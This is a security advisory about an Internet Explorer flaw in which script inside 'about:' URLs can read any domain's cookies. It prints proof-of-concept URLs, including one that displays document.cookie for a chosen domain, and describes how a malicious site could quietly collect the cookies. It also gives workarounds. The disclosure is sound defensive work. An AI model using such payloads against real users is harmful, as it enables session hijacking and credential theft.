|
Brought to you by:
Suppliers of:
|
|
|
| |
| As we reported in our previous article: Cookie Data in IE Can Be Exposed or Altered Through Script Injection, a security vulnerability has been uncovered in the way Internet Explorer handles JavaScript inside "about:" URLs. The vulnerability gives an attacker access to the web user's stored cookies. |
| |
Credit:
The information has been provided by Jouko Pynnonen.
|
| |
Microsoft Internet Explorer has a vulnerability that allows a malicious website to access any cookie in the browser's memory or those stored on disk. Cookies are used by web sites for storing preferences, statistics and tracking users, but also for storing more sensitive information such as session keys and even usernames and passwords. Cookies are used by many (probably most) online banks, web mail systems, and other sites requiring user authentication.
Access to cookies may allow an attacker to retrieve passwords or other sensitive information, or hijack authenticated web sessions.
What makes this possible are certain features of "about:" URL handling of IE. For some reason, an URL starting with "about:" can contain html code that will be interpreted by the browser. For instance entering the URL "about:<h1>hello</h1>" brings up a page with the heading "hello". The URL may contain JavaScript as well. Going to the following location with IE causes an alert box to be displayed:
about:<script language=JavaScript>alert('ALERT');</script>
Finally, the about URL may have a hostname placed after the colon, and IE uses that hostname when determining the cookies to use:
about://www.anydomain.fi/<script language=JavaScript>alert(document.cookie);</script>
The above URL would result in IE displaying cookies of www.anydomain.fi in the alert box, assuming that the site has been visited and it has set a cookie that has not expired.
A malicious website can have a piece of JavaScript redirecting the browser to an about: URL similar to the one above, and do anything with the cookie information of any selected domain. Instead of showing an alert box, the JavaScript code might just pass the cookie contents to a script or a CGI program which could quietly store the information to a file and then redirect the browser elsewhere or show some seemingly harmless web content.
A web page for testing the vulnerability can be found at
http://www.solutions.fi/iebug/
You can type in an address of a website that uses cookies, (without "http://") and it will tell you if your browser is vulnerable to the problem. For a relatively harmless test case try typing the address www.google.com in the box, assuming you have visited Google before.
At least IE versions 6 and 5.50 appear to be vulnerable, but it looks like some older versions as 5.00 are not, at least in the way described above. It interprets the html and JavaScript, but does not have any cookie data in document.cookie.
A vulnerability with the same impact came public in May 2000, see: http://www.peacefire.org/security/iecookies/.
Workaround:
You can protect yourself from the vulnerability by disabling cookies (at Tools -> Internet options -> Security -> Customize) or by switching to another browser such as Opera or Netscape, which do not appear to have the same about: URL features.
Solution:
See our previous article:
Cookie Data in IE Can Be Exposed or Altered Through Script Injection
|
|
|
|
|
